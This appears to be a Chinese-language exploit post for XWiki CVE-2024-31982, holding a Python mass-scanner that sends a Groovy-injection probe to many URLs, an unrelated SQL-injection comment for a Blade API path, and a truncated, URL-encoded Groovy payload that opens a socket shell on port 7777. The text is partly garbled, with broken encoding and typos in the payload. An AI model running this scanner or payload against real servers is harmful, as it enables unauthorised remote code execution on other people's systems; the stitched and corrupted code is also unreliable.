xwiki-CVE-2024-31982漏洞深入复现

body="data-xwiki-reference"

# GET /api/blade-system/tenant/list?updatexml(1,concat(0x7e,version(),0x7e
import requestsfrom requests.packages.urllib3.exceptions import InsecureRequestWarningimport threadingimport queueimport time
headers = {    'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36',    'Accept-Encoding': 'gzip, deflate',    'Accept': '*/*',    'Connection': 'keep-alive'}proxies = {    'http': 'http://127.0.0.1:8080',    'https': 'http://127.0.0.1:8080'}
def poc(url):    if not url.startswith('http'):        url = 'http://' + url    if not url.endswith('/'):        url += '/'     payload = url + 'xwiki/bin/get/Main/DatabaseSearch?outputSyntax=plain&text=%7D%7D%7D%7B%7Basync%20as7B%2Fasync%7D%7D%20'    try:        requests.packages.urllib3.disable_warnings(InsecureRequestWarning)        response = requests.get(payload, headers = headers, proxies = proxies, verify = False, timeout = 5)        print(url)        if response.status_code == 200:            print(url, '[+]存在xwiki-CVE-2024-31982漏洞')    except requests.exceptions.Timeout:        print(url, '连接超时')    except Exception as e:        if 'HTTPSConnectionPool' in str(e) or 'Burp Suite Professional' in str(e):            print(url, '证书错误')        else:            print(str(e))
with open(input('urls:').strip(), 'r', encoding = 'utf-8')as f1:    for url in f1:        poc(url.strip())

7D%7D%7D%7B%7Basync%20async%3Dfalse%7D%7D%7B%7Bgroovy%7D%7Dimport%20java..*%3B%0A%0AStrint%20port%20%3D%207777%3B%0A%0Atry%20%7B%0ort%29%3B%0A%20%20InputStream%20in.getInputStream%28%29%3B%0A%20%20OutputStream%20outputStream%20%3D%20socket.getOutputStream%28%29%3B%0A%20%20PrintWriter%20writer%20%3D%20new%20PrintWriter%28outputStream%2C%20true%29%3B%0A%20%20BufferedReader%20reader%20%3D%20new%20BufferedReader%28new%20InputStreamReader%28inpu